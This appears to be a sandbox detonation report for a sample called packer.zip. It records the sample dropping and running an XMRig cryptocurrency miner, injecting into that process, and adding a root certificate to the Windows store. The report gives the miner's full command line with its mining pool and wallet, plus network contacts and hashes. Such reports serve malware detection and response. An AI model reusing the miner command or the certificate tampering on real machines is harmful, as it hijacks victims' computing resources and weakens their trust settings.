Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 17:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:01
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1806s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2540 wrote to memory of 4940 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2540 wrote to memory of 4940 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4940-16-0x000001B269DA0000-0x000001B269DC0000-memory.dmp
memory/4940-17-0x000001B269DF0000-0x000001B269E10000-memory.dmp
memory/4940-18-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-21-0x000001B269E10000-0x000001B269E30000-memory.dmp
memory/4940-20-0x000001B269E30000-0x000001B269E50000-memory.dmp
memory/4940-19-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-22-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-23-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-24-0x000001B269E30000-0x000001B269E50000-memory.dmp
memory/4940-25-0x000001B269E10000-0x000001B269E30000-memory.dmp
memory/4940-26-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-27-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-28-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-29-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-30-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-31-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-32-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-33-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-34-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-35-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-36-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-37-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-38-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-39-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-40-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-41-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-42-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-43-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-44-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-45-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-46-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-47-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-48-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-49-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-50-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-51-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-52-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-53-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-54-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-55-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-56-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-57-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-58-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-59-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-60-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-61-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-62-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-63-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-64-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-65-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-66-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-67-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-68-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-69-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-70-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-71-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-72-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-73-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-74-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-75-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-76-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-77-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-78-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-79-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-80-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-81-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-82-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-83-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
memory/4940-84-0x00007FF7CEA60000-0x00007FF7CF563000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 888 wrote to memory of 2816 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 888 wrote to memory of 2816 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.98.74.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2816-16-0x000002BDE54A0000-0x000002BDE54C0000-memory.dmp
memory/2816-17-0x000002BDE54E0000-0x000002BDE5500000-memory.dmp
memory/2816-18-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-20-0x000002BDE5520000-0x000002BDE5540000-memory.dmp
memory/2816-19-0x000002BDE5500000-0x000002BDE5520000-memory.dmp
memory/2816-21-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-22-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-25-0x000002BDE5520000-0x000002BDE5540000-memory.dmp
memory/2816-24-0x000002BDE5500000-0x000002BDE5520000-memory.dmp
memory/2816-23-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-26-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-27-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-28-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-29-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-30-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-31-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-32-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-33-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-34-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-35-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-36-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-37-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-38-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-39-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-40-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-41-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-42-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-43-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-44-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-45-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-46-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-47-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-48-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-49-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-50-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-51-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-52-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-53-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-54-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-55-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-56-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-57-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-58-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-59-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-60-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-61-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-62-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-63-0x00007FF717A40000-0x00007FF718543000-memory.dmp
